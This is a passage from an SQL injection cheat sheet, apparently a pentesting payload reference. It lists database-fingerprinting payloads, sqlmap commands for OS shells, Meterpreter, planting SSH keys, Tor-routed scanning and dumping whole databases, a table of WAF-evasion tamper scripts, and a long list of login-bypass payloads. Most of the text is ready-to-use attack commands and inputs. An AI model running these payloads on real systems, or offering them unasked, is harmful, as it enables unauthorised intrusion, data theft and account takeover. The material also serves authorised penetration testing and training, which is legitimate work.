<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="p">[</span><span class="s">&quot;conv(&#39;a&#39;,16,2)=conv(&#39;a&#39;,16,2)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MYSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="p">[</span><span class="s">&quot;connection_id()=connection_id()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MYSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-3" name="__codelineno-5-3" href="#__codelineno-5-3"></a><span class="p">[</span><span class="s">&quot;crc32(&#39;MySQL&#39;)=crc32(&#39;MySQL&#39;)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MYSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-4" name="__codelineno-5-4" href="#__codelineno-5-4"></a><span class="p">[</span><span class="s">&quot;BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-5" name="__codelineno-5-5" href="#__codelineno-5-5"></a><span class="p">[</span><span class="s">&quot;@@CONNECTIONS&gt;0&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-6" name="__codelineno-5-6" href="#__codelineno-5-6"></a><span class="p">[</span><span class="s">&quot;@@CONNECTIONS=@@CONNECTIONS&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-7" name="__codelineno-5-7" href="#__codelineno-5-7"></a><span class="p">[</span><span class="s">&quot;@@CPU_BUSY=@@CPU_BUSY&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-8" name="__codelineno-5-8" href="#__codelineno-5-8"></a><span class="p">[</span><span class="s">&quot;USER_ID(1)=USER_ID(1)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-9" name="__codelineno-5-9" href="#__codelineno-5-9"></a><span class="p">[</span><span class="s">&quot;ROWNUM=ROWNUM&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;ORACLE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-10" name="__codelineno-5-10" href="#__codelineno-5-10"></a><span class="p">[</span><span class="s">&quot;RAWTOHEX(&#39;AB&#39;)=RAWTOHEX(&#39;AB&#39;)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;ORACLE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-11" name="__codelineno-5-11" href="#__codelineno-5-11"></a><span class="p">[</span><span class="s">&quot;LNNVL(0=123)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;ORACLE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-12" name="__codelineno-5-12" href="#__codelineno-5-12"></a><span class="p">[</span><span class="s">&quot;5::int=5&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-13" name="__codelineno-5-13" href="#__codelineno-5-13"></a><span class="p">[</span><span class="s">&quot;5::integer=5&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-14" name="__codelineno-5-14" href="#__codelineno-5-14"></a><span class="p">[</span><span class="s">&quot;pg_client_encoding()=pg_client_encoding()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-15" name="__codelineno-5-15" href="#__codelineno-5-15"></a><span class="p">[</span><span class="s">&quot;get_current_ts_config()=get_current_ts_config()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-16" name="__codelineno-5-16" href="#__codelineno-5-16"></a><span class="p">[</span><span class="s">&quot;quote_literal(42.5)=quote_literal(42.5)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-17" name="__codelineno-5-17" href="#__codelineno-5-17"></a><span class="p">[</span><span class="s">&quot;current_database()=current_database()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;POSTGRESQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-18" name="__codelineno-5-18" href="#__codelineno-5-18"></a><span class="p">[</span><span class="s">&quot;sqlite_version()=sqlite_version()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;SQLITE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-19" name="__codelineno-5-19" href="#__codelineno-5-19"></a><span class="p">[</span><span class="s">&quot;last_insert_rowid()&gt;1&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;SQLITE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-20" name="__codelineno-5-20" href="#__codelineno-5-20"></a><span class="p">[</span><span class="s">&quot;last_insert_rowid()=last_insert_rowid()&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;SQLITE&quot;</span><span class="p">],</span>
<a id="__codelineno-5-21" name="__codelineno-5-21" href="#__codelineno-5-21"></a><span class="p">[</span><span class="s">&quot;val(cvar(1))=1&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSACCESS&quot;</span><span class="p">],</span>
<a id="__codelineno-5-22" name="__codelineno-5-22" href="#__codelineno-5-22"></a><span class="p">[</span><span class="s">&quot;IIF(ATN(2)&gt;0,1,0) BETWEEN 2 AND 0&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSACCESS&quot;</span><span class="p">],</span>
<a id="__codelineno-5-23" name="__codelineno-5-23" href="#__codelineno-5-23"></a><span class="p">[</span><span class="s">&quot;cdbl(1)=cdbl(1)&quot;</span><span class="w"> </span><span class="p">,</span><span class="s">&quot;MSACCESS&quot;</span><span class="p">],</span>
<a id="__codelineno-5-24" name="__codelineno-5-24" href="#__codelineno-5-24"></a><span class="p">[</span><span class="s">&quot;1337=1337&quot;</span><span class="p">,</span><span class="w"> </span><span class="s">&quot;MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL&quot;</span><span class="p">],</span>
<a id="__codelineno-5-25" name="__codelineno-5-25" href="#__codelineno-5-25"></a><span class="p">[</span><span class="s">&quot;&#39;i&#39;=&#39;i&#39;&quot;</span><span class="p">,</span><span class="w"> </span><span class="s">&quot;MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL&quot;</span><span class="p">],</span>
</code></pre></div>
<h2 id="sql-injection-using-sqlmap">SQL injection using SQLmap</h2>
<p><a href="https://github.com/sqlmapproject/sqlmap">sqlmapproject/sqlmap</a> is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers.</p>
<h3 id="basic-arguments-for-sqlmap">Basic arguments for SQLmap</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="n">sqlmap</span> <span class="p">-</span><span class="n">-url</span><span class="p">=</span><span class="s2">&quot;&lt;url&gt;&quot;</span> <span class="n">-p</span> <span class="n">username</span> <span class="p">-</span><span class="n">-user-agent</span><span class="p">=</span><span class="n">SQLMAP</span> <span class="p">-</span><span class="n">-random-agent</span> <span class="p">-</span><span class="n">-threads</span><span class="p">=</span><span class="n">10</span> <span class="p">-</span><span class="n">-risk</span><span class="p">=</span><span class="n">3</span> <span class="p">-</span><span class="n">-level</span><span class="p">=</span><span class="n">5</span> <span class="p">-</span><span class="n">-eta</span> <span class="p">-</span><span class="n">-dbms</span><span class="p">=</span><span class="n">MySQL</span> <span class="p">-</span><span class="n">-os</span><span class="p">=</span><span class="n">Linux</span> <span class="p">-</span><span class="n">-banner</span> <span class="p">-</span><span class="o">-is</span><span class="n">-dba</span> <span class="p">-</span><span class="n">-users</span> <span class="p">-</span><span class="n">-passwords</span> <span class="p">-</span><span class="n">-current-user</span> <span class="p">-</span><span class="n">-dbs</span>
</code></pre></div>
<h3 id="load-a-request-file-and-use-mobile-user-agent">Load a request file and use mobile user-agent</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="n">sqlmap</span> <span class="n">-r</span> <span class="n">sqli</span><span class="p">.</span><span class="n">req</span> <span class="p">-</span><span class="n">-safe-url</span><span class="p">=</span><span class="n">http</span><span class="p">://</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">/</span> <span class="p">-</span><span class="n">-mobile</span> <span class="p">-</span><span class="n">-safe-freq</span><span class="p">=</span><span class="n">1</span>
</code></pre></div>
<h3 id="custom-injection-in-useragentheaderreferercookie">Custom injection in UserAgent/Header/Referer/Cookie</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="n">python</span> <span class="n">sqlmap</span><span class="p">.</span><span class="n">py</span> <span class="n">-u</span> <span class="s2">&quot;http://example.com&quot;</span> <span class="p">-</span><span class="n">-data</span> <span class="s2">&quot;username=admin&amp;password=pass&quot;</span> <span class="p">-</span><span class="n">-headers</span><span class="p">=</span><span class="s2">&quot;x-forwarded-for:127.0.0.1*&quot;</span>
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a><span class="n">The</span> <span class="n">injection</span> <span class="n">is</span> <span class="n">located</span> <span class="n">at</span> <span class="n">the</span> <span class="s1">&#39;*&#39;</span>
</code></pre></div>
<h3 id="second-order-injection">Second order injection</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="n">python</span> <span class="n">sqlmap</span><span class="p">.</span><span class="n">py</span> <span class="n">-r</span> <span class="p">/</span><span class="n">tmp</span><span class="p">/</span><span class="n">r</span><span class="p">.</span><span class="n">txt</span> <span class="p">-</span><span class="n">-dbms</span> <span class="n">MySQL</span> <span class="p">-</span><span class="n">-second-order</span> <span class="s2">&quot;http://targetapp/wishlist&quot;</span> <span class="n">-v</span> <span class="n">3</span>
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a><span class="n">sqlmap</span> <span class="n">-r</span> <span class="n">1</span><span class="p">.</span><span class="n">txt</span> <span class="n">-dbms</span> <span class="n">MySQL</span> <span class="n">-second-order</span> <span class="s2">&quot;http://&lt;IP/domain&gt;/joomla/administrator/index.php&quot;</span> <span class="n">-D</span> <span class="s2">&quot;joomla&quot;</span> <span class="n">-dbs</span>
</code></pre></div>
<h3 id="shell">Shell</h3>
<ul>
<li>SQL Shell: <code>python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell</code></li>
<li>OS Shell: <code>python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell</code></li>
<li>Meterpreter: <code>python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn</code></li>
<li>SSH Shell: <code>python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/</code></li>
</ul>
<h3 id="crawl-a-website-with-sqlmap-and-auto-exploit">Crawl a website with SQLmap and auto-exploit</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">sqlmap</span> <span class="n">-u</span> <span class="s2">&quot;http://example.com/&quot;</span> <span class="p">-</span><span class="n">-crawl</span><span class="p">=</span><span class="n">1</span> <span class="p">-</span><span class="n">-random-agent</span> <span class="p">-</span><span class="n">-batch</span> <span class="p">-</span><span class="n">-forms</span> <span class="p">-</span><span class="n">-threads</span><span class="p">=</span><span class="n">5</span> <span class="p">-</span><span class="n">-level</span><span class="p">=</span><span class="n">5</span> <span class="p">-</span><span class="n">-risk</span><span class="p">=</span><span class="n">3</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="p">-</span><span class="n">-batch</span> <span class="p">=</span> <span class="n">non</span> <span class="n">interactive</span> <span class="n">mode</span><span class="p">,</span> <span class="n">usually</span> <span class="n">Sqlmap</span> <span class="n">will</span> <span class="n">ask</span> <span class="n">you</span> <span class="n">questions</span><span class="p">,</span> <span class="n">this</span> <span class="n">accepts</span> <span class="n">the</span> <span class="k">default</span> <span class="n">answers</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="p">-</span><span class="n">-crawl</span> <span class="p">=</span> <span class="n">how</span> <span class="n">deep</span> <span class="n">you</span> <span class="n">want</span> <span class="n">to</span> <span class="n">crawl</span> <span class="n">a</span> <span class="n">site</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a><span class="p">-</span><span class="n">-forms</span> <span class="p">=</span> <span class="n">Parse</span> <span class="n">and</span> <span class="n">test</span> <span class="n">forms</span>
</code></pre></div>
<h3 id="using-tor-with-sqlmap">Using TOR with SQLmap</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="n">sqlmap</span> <span class="n">-u</span> <span class="s2">&quot;http://www.target.com&quot;</span> <span class="p">-</span><span class="n">-tor</span> <span class="p">-</span><span class="n">-tor-type</span><span class="p">=</span><span class="n">SOCKS5</span> <span class="p">-</span><span class="n">-time-sec</span> <span class="n">11</span> <span class="p">-</span><span class="n">-check-tor</span> <span class="p">-</span><span class="n">-level</span><span class="p">=</span><span class="n">5</span> <span class="p">-</span><span class="n">-risk</span><span class="p">=</span><span class="n">3</span> <span class="p">-</span><span class="n">-threads</span><span class="p">=</span><span class="n">5</span>
</code></pre></div>
<h3 id="using-a-proxy-with-sqlmap">Using a proxy with SQLmap</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="n">sqlmap</span> <span class="n">-u</span> <span class="s2">&quot;http://www.target.com&quot;</span> <span class="p">-</span><span class="n">-proxy</span><span class="p">=</span><span class="s2">&quot;http://127.0.0.1:8080&quot;</span>
</code></pre></div>
<h3 id="using-chrome-cookie-and-a-proxy">Using Chrome cookie and a Proxy</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-13-1" name="__codelineno-13-1" href="#__codelineno-13-1"></a><span class="n">sqlmap</span> <span class="n">-u</span> <span class="s2">&quot;https://test.com/index.php?id=99&quot;</span> <span class="p">-</span><span class="n">-load-cookie</span><span class="p">=/</span><span class="n">media</span><span class="p">/</span><span class="n">truecrypt1</span><span class="p">/</span><span class="n">TI</span><span class="p">/</span><span class="n">cookie</span><span class="p">.</span><span class="n">txt</span> <span class="p">-</span><span class="n">-proxy</span> <span class="s2">&quot;http://127.0.0.1:8080&quot;</span> <span class="o">-f</span> <span class="p">-</span><span class="n">-time-sec</span> <span class="n">15</span> <span class="p">-</span><span class="n">-level</span> <span class="n">3</span>
</code></pre></div>
<h3 id="using-suffix-to-tamper-the-injection">Using suffix to tamper the injection</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-14-1" name="__codelineno-14-1" href="#__codelineno-14-1"></a><span class="n">python</span> <span class="n">sqlmap</span><span class="p">.</span><span class="n">py</span> <span class="n">-u</span> <span class="s2">&quot;http://example.com/?id=1&quot;</span> <span class="n">-p</span> <span class="n">id</span> <span class="p">-</span><span class="n">-suffix</span><span class="p">=</span><span class="s2">&quot;-- &quot;</span>
</code></pre></div>
<h3 id="general-tamper-option-and-tampers-list">General tamper option and tamper's list</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-15-1" name="__codelineno-15-1" href="#__codelineno-15-1"></a><span class="n">tamper</span><span class="p">=</span><span class="n">name_of_the_tamper</span>
</code></pre></div>
<table>
<thead>
<tr>
<th>Tamper</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x2char.py</td>
<td>Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart</td>
</tr>
<tr>
<td>apostrophemask.py</td>
<td>Replaces apostrophe character with its UTF-8 full width counterpart</td>
</tr>
<tr>
<td>apostrophenullencode.py</td>
<td>Replaces apostrophe character with its illegal double unicode counterpart</td>
</tr>
<tr>
<td>appendnullbyte.py</td>
<td>Appends encoded NULL byte character at the end of payload</td>
</tr>
<tr>
<td>base64encode.py</td>
<td>Base64 all characters in a given payload</td>
</tr>
<tr>
<td>between.py</td>
<td>Replaces greater than operator ('&gt;') with 'NOT BETWEEN 0 AND #'</td>
</tr>
<tr>
<td>bluecoat.py</td>
<td>Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator</td>
</tr>
<tr>
<td>chardoubleencode.py</td>
<td>Double url-encodes all characters in a given payload (not processing already encoded)</td>
</tr>
<tr>
<td>charencode.py</td>
<td>URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; %53%45%4C%45%43%54)</td>
</tr>
<tr>
<td>charunicodeencode.py</td>
<td>Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; %u0053%u0045%u004C%u0045%u0043%u0054)</td>
</tr>
<tr>
<td>charunicodeescape.py</td>
<td>Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -&gt; \u0053\u0045\u004C\u0045\u0043\u0054)</td>
</tr>
<tr>
<td>commalesslimit.py</td>
<td>Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'</td>
</tr>
<tr>
<td>commalessmid.py</td>
<td>Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'</td>
</tr>
<tr>
<td>commentbeforeparentheses.py</td>
<td>Prepends (inline) comment before parentheses (e.g. ( -&gt; /**/()</td>
</tr>
<tr>
<td>concat2concatws.py</td>
<td>Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'</td>
</tr>
<tr>
<td>charencode.py</td>
<td>Url-encodes all characters in a given payload (not processing already encoded)</td>
</tr>
<tr>
<td>charunicodeencode.py</td>
<td>Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)</td>
</tr>
<tr>
<td>equaltolike.py</td>
<td>Replaces all occurrences of operator equal ('=') with operator 'LIKE'</td>
</tr>
<tr>
<td>escapequotes.py</td>
<td>Slash escape quotes (' and ")</td>
</tr>
<tr>
<td>greatest.py</td>
<td>Replaces greater than operator ('&gt;') with 'GREATEST' counterpart</td>
</tr>
<tr>
<td>halfversionedmorekeywords.py</td>
<td>Adds versioned MySQL comment before each keyword</td>
</tr>
<tr>
<td>htmlencode.py</td>
<td>HTML encode (using code points) all non-alphanumeric characters (e.g. -&gt; &#39;)</td>
</tr>
<tr>
<td>ifnull2casewhenisnull.py</td>
<td>Replaces instances like IFNULL(A, B) with CASE WHEN ISNULL(A) THEN (B) ELSE (A) END counterpart</td>
</tr>
<tr>
<td>ifnull2ifisnull.py</td>
<td>Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'</td>
</tr>
<tr>
<td>informationschemacomment.py</td>
<td>Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier</td>
</tr>
<tr>
<td>least.py</td>
<td>Replaces greater than operator (&gt;) with LEAST counterpart</td>
</tr>
<tr>
<td>lowercase.py</td>
<td>Replaces each keyword character with lower case value (e.g. SELECT -&gt; select)</td>
</tr>
<tr>
<td>modsecurityversioned.py</td>
<td>Embraces complete query with versioned comment</td>
</tr>
<tr>
<td>modsecurityzeroversioned.py</td>
<td>Embraces complete query with zero-versioned comment</td>
</tr>
<tr>
<td>multiplespaces.py</td>
<td>Adds multiple spaces around SQL keywords</td>
</tr>
<tr>
<td>nonrecursivereplacement.py</td>
<td>Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters</td>
</tr>
<tr>
<td>overlongutf8.py</td>
<td>Converts all characters in a given payload (not processing already encoded)</td>
</tr>
<tr>
<td>overlongutf8more.py</td>
<td>Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -&gt; %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)</td>
</tr>
<tr>
<td>percentage.py</td>
<td>Adds a percentage sign ('%') infront of each character</td>
</tr>
<tr>
<td>plus2concat.py</td>
<td>Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart</td>
</tr>
<tr>
<td>plus2fnconcat.py</td>
<td>Replaces plus operator (+) with (MsSQL) ODBC function {fn CONCAT()} counterpart</td>
</tr>
<tr>
<td>randomcase.py</td>
<td>Replaces each keyword character with random case value</td>
</tr>
<tr>
<td>randomcomments.py</td>
<td>Add random comments to SQL keywords</td>
</tr>
<tr>
<td>securesphere.py</td>
<td>Appends special crafted string</td>
</tr>
<tr>
<td>sp_password.py</td>
<td>Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs</td>
</tr>
<tr>
<td>space2comment.py</td>
<td>Replaces space character (' ') with comments</td>
</tr>
<tr>
<td>space2dash.py</td>
<td>Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')</td>
</tr>
<tr>
<td>space2hash.py</td>
<td>Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')</td>
</tr>
<tr>
<td>space2morehash.py</td>
<td>Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')</td>
</tr>
<tr>
<td>space2mssqlblank.py</td>
<td>Replaces space character (' ') with a random blank character from a valid set of alternate characters</td>
</tr>
<tr>
<td>space2mssqlhash.py</td>
<td>Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')</td>
</tr>
<tr>
<td>space2mysqlblank.py</td>
<td>Replaces space character (' ') with a random blank character from a valid set of alternate characters</td>
</tr>
<tr>
<td>space2mysqldash.py</td>
<td>Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')</td>
</tr>
<tr>
<td>space2plus.py</td>
<td>Replaces space character (' ') with plus ('+')</td>
</tr>
<tr>
<td>space2randomblank.py</td>
<td>Replaces space character (' ') with a random blank character from a valid set of alternate characters</td>
</tr>
<tr>
<td>symboliclogical.py</td>
<td>Replaces AND and OR logical operators with their symbolic counterparts (&amp;&amp; and</td>
</tr>
<tr>
<td>unionalltounion.py</td>
<td>Replaces UNION ALL SELECT with UNION SELECT</td>
</tr>
<tr>
<td>unmagicquotes.py</td>
<td>Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)</td>
</tr>
<tr>
<td>uppercase.py</td>
<td>Replaces each keyword character with upper case value 'INSERT'</td>
</tr>
<tr>
<td>varnish.py</td>
<td>Append a HTTP header 'X-originating-IP'</td>
</tr>
<tr>
<td>versionedkeywords.py</td>
<td>Encloses each non-function keyword with versioned MySQL comment</td>
</tr>
<tr>
<td>versionedmorekeywords.py</td>
<td>Encloses each keyword with versioned MySQL comment</td>
</tr>
<tr>
<td>xforwardedfor.py</td>
<td>Append a fake HTTP header 'X-Forwarded-For'</td>
</tr>
</tbody>
</table>
<h3 id="sqlmap-without-sql-injection">SQLmap without SQL injection</h3>
<p>You can use SQLmap to access a database via its port instead of a URL.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-16-1" name="__codelineno-16-1" href="#__codelineno-16-1"></a><span class="n">sqlmap</span><span class="p">.</span><span class="n">py</span> <span class="n">-d</span> <span class="s2">&quot;mysql://user:pass@ip/database&quot;</span> <span class="p">-</span><span class="n">-dump-all</span>
</code></pre></div>
<h2 id="authentication-bypass">Authentication bypass</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-17-1" name="__codelineno-17-1" href="#__codelineno-17-1"></a><span class="s1">&#39;-&#39;</span>
<a id="__codelineno-17-2" name="__codelineno-17-2" href="#__codelineno-17-2"></a><span class="s1">&#39; &#39;</span>
<a id="__codelineno-17-3" name="__codelineno-17-3" href="#__codelineno-17-3"></a><span class="s1">&#39;&amp;&#39;</span>
<a id="__codelineno-17-4" name="__codelineno-17-4" href="#__codelineno-17-4"></a><span class="s1">&#39;^&#39;</span>
<a id="__codelineno-17-5" name="__codelineno-17-5" href="#__codelineno-17-5"></a><span class="s1">&#39;*&#39;</span>
<a id="__codelineno-17-6" name="__codelineno-17-6" href="#__codelineno-17-6"></a><span class="s1">&#39; or 1=1 limit 1 -- -+</span>
<a id="__codelineno-17-7" name="__codelineno-17-7" href="#__codelineno-17-7"></a><span class="s1">&#39;</span><span class="o">=</span><span class="ss">&quot;or&#39;</span>
<a id="__codelineno-17-8" name="__codelineno-17-8" href="#__codelineno-17-8"></a><span class="ss">&#39; or &#39;&#39;-&#39;</span>
<a id="__codelineno-17-9" name="__codelineno-17-9" href="#__codelineno-17-9"></a><span class="ss">&#39; or &#39;&#39; &#39;</span>
<a id="__codelineno-17-10" name="__codelineno-17-10" href="#__codelineno-17-10"></a><span class="ss">&#39; or &#39;&#39;&amp;&#39;</span>
<a id="__codelineno-17-11" name="__codelineno-17-11" href="#__codelineno-17-11"></a><span class="ss">&#39; or &#39;&#39;^&#39;</span>
<a id="__codelineno-17-12" name="__codelineno-17-12" href="#__codelineno-17-12"></a><span class="ss">&#39; or &#39;&#39;*&#39;</span>
<a id="__codelineno-17-13" name="__codelineno-17-13" href="#__codelineno-17-13"></a><span class="ss">&#39;-||0&#39;</span>
<a id="__codelineno-17-14" name="__codelineno-17-14" href="#__codelineno-17-14"></a><span class="ss">&quot;</span><span class="o">-||</span><span class="mi">0</span><span class="ss">&quot;</span>
<a id="__codelineno-17-15" name="__codelineno-17-15" href="#__codelineno-17-15"></a><span class="ss">&quot;</span><span class="o">-</span><span class="ss">&quot;</span>
<a id="__codelineno-17-16" name="__codelineno-17-16" href="#__codelineno-17-16"></a><span class="ss">&quot;</span><span class="w"> </span><span class="ss">&quot;</span>
<a id="__codelineno-17-17" name="__codelineno-17-17" href="#__codelineno-17-17"></a><span class="ss">&quot;</span><span class="o">&amp;</span><span class="ss">&quot;</span>
<a id="__codelineno-17-18" name="__codelineno-17-18" href="#__codelineno-17-18"></a><span class="ss">&quot;</span><span class="o">^</span><span class="ss">&quot;</span>
<a id="__codelineno-17-19" name="__codelineno-17-19" href="#__codelineno-17-19"></a><span class="ss">&quot;</span><span class="o">*</span><span class="ss">&quot;</span>
<a id="__codelineno-17-20" name="__codelineno-17-20" href="#__codelineno-17-20"></a><span class="ss">&#39;--&#39;</span>
<a id="__codelineno-17-21" name="__codelineno-17-21" href="#__codelineno-17-21"></a><span class="ss">&quot;</span><span class="c1">--&quot;</span>
<a id="__codelineno-17-22" name="__codelineno-17-22" href="#__codelineno-17-22"></a><span class="s1">&#39;--&#39;</span><span class="w"> </span><span class="o">/</span><span class="w"> </span><span class="ss">&quot;--&quot;</span>
<a id="__codelineno-17-23" name="__codelineno-17-23" href="#__codelineno-17-23"></a><span class="ss">&quot; or &quot;&quot;-&quot;</span>
<a id="__codelineno-17-24" name="__codelineno-17-24" href="#__codelineno-17-24"></a><span class="ss">&quot; or &quot;&quot; &quot;</span>
<a id="__codelineno-17-25" name="__codelineno-17-25" href="#__codelineno-17-25"></a><span class="ss">&quot; or &quot;&quot;&amp;&quot;</span>
<a id="__codelineno-17-26" name="__codelineno-17-26" href="#__codelineno-17-26"></a><span class="ss">&quot; or &quot;&quot;^&quot;</span>
<a id="__codelineno-17-27" name="__codelineno-17-27" href="#__codelineno-17-27"></a><span class="ss">&quot; or &quot;&quot;*&quot;</span>
<a id="__codelineno-17-28" name="__codelineno-17-28" href="#__codelineno-17-28"></a><span class="k">or</span><span class="w"> </span><span class="k">true</span><span class="c1">--</span>
<a id="__codelineno-17-29" name="__codelineno-17-29" href="#__codelineno-17-29"></a><span class="ss">&quot; or true--</span>
<a id="__codelineno-17-30" name="__codelineno-17-30" href="#__codelineno-17-30"></a><span class="ss">&#39; or true--</span>
<a id="__codelineno-17-31" name="__codelineno-17-31" href="#__codelineno-17-31"></a><span class="ss">&quot;</span><span class="p">)</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="k">true</span><span class="c1">--</span>
<a id="__codelineno-17-32" name="__codelineno-17-32" href="#__codelineno-17-32"></a><span class="s1">&#39;) or true--</span>
<a id="__codelineno-17-33" name="__codelineno-17-33" href="#__codelineno-17-33"></a><span class="s1">&#39;</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="s1">&#39;x&#39;</span><span class="o">=</span><span class="s1">&#39;x</span>
<a id="__codelineno-17-34" name="__codelineno-17-34" href="#__codelineno-17-34"></a><span class="s1">&#39;</span><span class="p">)</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="p">(</span><span class="s1">&#39;x&#39;</span><span class="p">)</span><span class="o">=</span><span class="p">(</span><span class="s1">&#39;x</span>
<a id="__codelineno-17-35" name="__codelineno-17-35" href="#__codelineno-17-35"></a><span class="s1">&#39;</span><span class="p">))</span><span class="w"> </span><span class="k">or</span><span class="w"> </span><span class="p">((</span><span class="s1">&#39;x&#39;</span><span class="p">))</span><span class="o">=</span><span class="p">((</span><span class="s1">&#39;x</span>
<a id="__codelineno-17-36" name="__codelineno-17-36" href="#__codelineno-17-36"></a><span class="s1">&quot; or &quot;x&quot;=&quot;x</span>
